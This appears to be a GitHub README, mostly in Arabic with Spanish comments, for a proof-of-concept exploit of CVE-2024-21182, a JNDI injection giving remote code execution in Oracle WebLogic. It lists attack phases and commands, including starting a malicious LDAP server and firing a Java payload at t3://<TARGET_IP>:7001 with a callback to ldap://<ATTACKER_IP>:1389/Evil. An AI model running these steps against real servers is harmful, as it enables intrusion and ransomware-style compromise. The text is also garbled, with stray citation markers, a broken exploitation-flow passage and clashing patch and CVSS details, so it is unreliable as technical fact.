
استغلال إثبات المفهوم لـ CVE-2024-21182، حقن JNDI غير مصادق يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد في Oracle WebLogic Server عبر بروتوكولات T3/IIOP. يتضمن مختبر Docker للاختبار.
CVE-2024-21182 - Oracle WebLogic Server JNDI Injection → RCE
CVE-2024-21182 هي ثغرة أمنية في حقن JNDI غير مصدق تؤثر على المكون الأساسي لـ Oracle WebLogic Server. تسمح لمهاجم عن بُعد، عبر بروتوكولات T3 أو IIOP، بتنفيذ تعليمات برمجية عشوائية (RCE) على الخادم، مما قد يمنحه وصولًا كاملًا إلى جميع بيانات الخادم[citation:5][citation:8][citation:9].
يحتوي هذا المستودع على إثبات مفهوم (PoC) وظيفي يوضح الاستغلال الناجح لتصحيح CVE-2023-21839 باستخدام سلسلة الأدوات AggregatableOpaqueReference + MessageDestinationReference[citation:2][citation:4].
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
المرحلة 1: الاستطلاع: التعرف على خوادم WebLogic التي تحتوي على منافذ T3/IIOP (7001) مكشوفة.
المرحلة 2: التحليل: تحديد ما إذا كان الخادم يقوم بتشغيل إصدار ضعيف (12.2.1.4.0 أو 14.1.1.0.0) أو يفتقر إلى تصحيح أكتوبر 2024.
المرحلة 3: الاستغلال (التدفق الفني):
AggregatableOpaqueReference[citation:2].referent للكائن السابق ليشير إلى MessageDestinationReference ضار[citation:4].wlthint3client.jar (يمكن استخراجه من تثبيت WebLogic).# 1. Clonar el repositorio
git clone https://github.com/tu-usuario/CVE-2024-21182.git
cd CVE-2024-21182
# 2. Iniciar el laboratorio (víctima + atacante)
docker-compose up -d
# 3. Ejecutar la explotación automática
./validate.sh
الاستغلال ضد هدف حقيقي (مصرح به)
# 1. Iniciar el servidor LDAP/HTTP malicioso
python3 exploit/ldap_server.py
# 2. En otra terminal, ejecutar el payload Java
javac -cp ".:wlthint3client.jar" poc/CVE_2024_21182.java
java -cp ".:wlthint3client.jar" CVE_2024_21182 t3://<TARGET_IP>:7001 ldap://<ATTACKER_IP>:1389/Evil
الحالة الحالية وفقًا لـ CISA: "Known To Be Used in Ransomware Campaigns? Unknown" (ولكن عادةً نعم، فإن RCE في البرمجيات الوسيطة هي ناقل أولي في اختراقات برامج الفدية).
هذا الكود مخصص للأغراض التعليمية والبحثية فقط. الاستخدام غير السليم لهذا PoC ضد أنظمة دون إذن صريح هو غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذه المعلومات.
| السمة | القيمة |
|---|
| CVE | CVE-2024-21182 |
| المنتج | Oracle WebLogic Server (Core) |
| الإصدارات المتأثرة | 12.2.1.4.0 و 14.1.1.0.0[citation:7] |
| التصحيح المتاح | Oracle Critical Patch Update (يوليو 2024 وأكتوبر 2024)[citation:6] |
| الحالة في CISA KEV | استغلال نشط مؤكد (تمت الإضافة في 01/06/2026)[citation:3][citation:8] |
| الموعد النهائي للتخفيف (CISA) | 04/06/2026[citation:8] |